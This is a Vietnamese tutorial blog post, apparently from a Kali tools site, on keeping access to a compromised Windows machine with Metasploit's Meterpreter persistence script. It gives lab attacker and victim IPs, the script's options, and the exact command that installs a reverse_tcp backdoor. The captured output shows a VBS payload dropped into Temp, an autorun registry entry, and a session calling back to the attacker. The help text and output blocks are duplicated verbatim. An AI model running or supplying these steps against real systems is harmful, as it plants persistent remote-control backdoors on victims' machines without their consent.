[full_width] Có bao giờ bạn tự hỏi rằng nếu như đang kiểm soát mục tiêu thì bỗng nhiên bị mất kết nối vì một lý do bất ngờ đó chưa, n...
[full_width]
Có bao giờ bạn tự hỏi rằng nếu như đang kiểm soát mục tiêu thì bỗng nhiên bị mất kết nối vì một lý do bất ngờ đó chưa, nếu xảy ra trường hợp đó thì mọi cống sức trước đó có thể sẽ thành "công dã tràng" ngay. Và để giải quyết vấn đề này, bạn có thể nhờ đến một script có sẵn trên Metasploit tên là persistence.
HƯỚNG DẪN SỬ DỤNG PERSISTENCE
- Địa chỉ IP attacker: 192.168.220.129, sử dụng port 4444.
- Địa chỉ IP victim: 192.168.220.128
- Thời gian tự động thiết lập lại kết nối: 10 giây
Cấu trúc lệnh dùng chung khi muốn chạy một script trên payload Meterpreter:
meterpreter > run <script> [tùy-chọn] [tham-số]
Để xem hướng dẫn về script này ta hãy thêm tùy chọn -h vào sau lệnh:
meterpreter > run persistence -h
[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
Meterpreter Script for creating a persistent backdoor on a target host.
OPTIONS:
-A Automatically start a matching exploit/multi/handler to connect to the agent
-L <opt> Location in target host to write payload to, if none %TEMP% will be used.
-P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt> Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i <opt> The interval in seconds between each connection attempt
-p <opt> The port on which the system running Metasploit is listening
-r <opt> The IP of the system running Metasploit listening for the connect back
[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
Meterpreter Script for creating a persistent backdoor on a target host.
OPTIONS:
-A Automatically start a matching exploit/multi/handler to connect to the agent
-L <opt> Location in target host to write payload to, if none %TEMP% will be used.
-P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt> Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i <opt> The interval in seconds between each connection attempt
-p <opt> The port on which the system running Metasploit is listening
-r <opt> The IP of the system running Metasploit listening for the connect back
Ví dụ ở trường hợp này ta đang có một session trên máy nạn nhân:
meterpreter > run persistence -A -U -i 10 -p 4444 -r 192.168.220.129
[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-U2II8UP88B7_20171025.2248/WIN-U2II8UP88B7_20171025.2248.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.220.129 LPORT=4444
[*] Persistent agent script is 99667 bytes long
[+] Persistent Script written to C:\Users\Phat\AppData\Local\Temp\CbDHGgFHOsu.vbs
[*] Starting connection handler at port 4444 for windows/meterpreter/reverse_tcp
[+] exploit/multi/handler started!
[*] Executing script C:\Users\Phat\AppData\Local\Temp\CbDHGgFHOsu.vbs
[+] Agent executed with PID 1716
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\COIyKTcOhguJa
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\COIyKTcOhguJa
meterpreter > [*] Meterpreter session 3 opened (192.168.220.129:4444 -> 192.168.220.128:49170) at 2017-10-25 08:22:51 -0400
[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-U2II8UP88B7_20171025.2248/WIN-U2II8UP88B7_20171025.2248.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.220.129 LPORT=4444
[*] Persistent agent script is 99667 bytes long
[+] Persistent Script written to C:\Users\Phat\AppData\Local\Temp\CbDHGgFHOsu.vbs
[*] Starting connection handler at port 4444 for windows/meterpreter/reverse_tcp
[+] exploit/multi/handler started!
[*] Executing script C:\Users\Phat\AppData\Local\Temp\CbDHGgFHOsu.vbs
[+] Agent executed with PID 1716
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\COIyKTcOhguJa
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\COIyKTcOhguJa
meterpreter > [*] Meterpreter session 3 opened (192.168.220.129:4444 -> 192.168.220.128:49170) at 2017-10-25 08:22:51 -0400
nguồn: https://www.thekalitools.com/2017/10/duy-tri-kiem-soat-voi-script-persistence.html
COMMENTS